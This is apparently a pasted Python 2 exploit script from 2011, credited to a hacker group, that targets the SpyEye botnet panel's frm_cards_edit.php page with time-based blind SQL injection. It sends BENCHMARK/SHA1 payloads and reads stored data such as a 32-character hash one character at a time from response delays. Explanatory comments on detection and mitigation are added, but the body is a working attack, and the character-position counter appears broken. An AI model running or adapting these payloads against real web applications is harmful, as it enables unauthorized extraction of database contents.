
SpyEye r0073r xpl01t

R00TW0RM Sep 15th, 2011 6,402 Never
  1. #!/usr/bin/python
  2.  
  3. from httplib import HTTPConnection
  4. from time import time
  5. from sys import exit, argv, stdout
  6. import urllib
  7. print """
  8. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  9. 0             __      __   __                   __                           1
  10. 1           /'__`\ /'__`\/\ \__              /'__`\                        0
  11. 0     _ __ /\ \/\ \/\ \/\ \ \ ,_\ __  __  __/\ \/\ \ _ __    ___ ___       1
  12. 1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\    0
  13. 0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \   1
  14. 1     \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\  0
  15. 0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
  16. 1                                                                            0
  17. 0                                                                            1
  18. 1                                       >> SpyEye r0073r xpl01t              0
  19. 0                                       >> author : Sanjar Satsura           1
  20. 1                                       >> sanjar[at]xakep[dot]ru            0
  21. 0                                       >> Public v.0.1                      1
  22. 1                                       >> )c(  2011                         0
  23. 0                                                                            1
  24. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
  25.  
  26.  Example:                                                        
  27.  Spyeye_r0073r <host>/dir/"version()"                        
  28.  
  29. """  # Python 2 print statement: the banner and usage example go to stdout before the argument check runs
  30.  
  31. if len(argv)<=3: exit()  # needs three arguments after the script name; otherwise exits with no further output
  32. else:   print "[+]Started pwn..."
  33. # Inputs: target host, URL path prefix, and the SQL expression embedded in every request.
  34. host = argv[1]
  35. path = argv[2]
  36. sql = argv[3]  # joined into the payload by plain string concatenation (see the loop below)
  37. port = 80  # fixed; requests go over plain HTTP via HTTPConnection
  38.  
  39.  
  40. hash = ""  # collects matched characters; shadows the builtin hash() and is never read in the visible code
  41. full = []
  42.  
  43. for k in range(48,122):
  44.     full.append(k)
  45. full.append(0)
  46. # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
  47. # Candidate ASCII codes 48-121 ('0' through 'y'); the trailing 0 is a sentinel that ends the run.
  48.  
  49. delay = 0.5  # threshold in seconds; a slower response is treated as a match
  50. a=1  # a - 1 is the number of characters matched so far
  51. while a <= 32:  # stops after 32 matches; presumably sized for a 32-character hex digest (TODO confirm)
  52.     for i in full:
  53.         j = 0  # j supplies the SUBSTRING position argument in the payload below
  54.         if i == 0:  exit('\n[+]Finished\n')  # sentinel reached: no candidate produced a slow response
  55.         # Time-based blind SQL injection probe: if the injected comparison holds, BENCHMARK(9000000,SHA1(1)) runs and slows the reply; only latency is read.
  56.         start = time()
  57.         # Timer starts before the connection is created, so connection setup is part of the measured time.
  58.         conn = HTTPConnection(host,port)
  59.         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
  60.         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
  61.         data = urllib.urlencode(values)  # URL-encodes the id=<payload> pair
  62.         print data  # every encoded payload is echoed to stdout
  63.         conn.request("GET", path + "frm_cards_edit.php?" + data )  # Detection: the keywords BENCHMARK, SHA1 and SUBSTRING travel in the GET query string (punctuation percent-encoded), so they typically appear in web-server access logs
  64.         response = conn.getresponse()
  65.         read = response.read()    # body is read in full and echoed on the next line
  66.         print read
  67.         # Mitigation for this class of flaw (inferred from the payload shape; the server-side code is not shown): bind id as an integer parameter instead of concatenating it into SQL.
  68.         if response.status == 404: exit('[+]404')
  69.         # A 404 means path + "frm_cards_edit.php" was not found on the host, so the run aborts.
  70.         now = time()
  71.         if now - start > delay:
  72.         # Response slower than `delay`: the tested condition is taken as true and chr(i) is recorded.
  73.             stdout.write(chr(i))
  74.             stdout.flush()
  75.             hash += chr(i)
  76.             a += 1
  77.             break;
  78.         else: j += 1
  79.         print "i vale %s, y J vale %s" %(i,j)  # debug trace; Spanish for "i is %s, and J is %s"
  80.                
  81.                
  82.                
  83. # w4tch u. h4ck u. fuck u. 1337day
  84. # www.r00tw0rm.com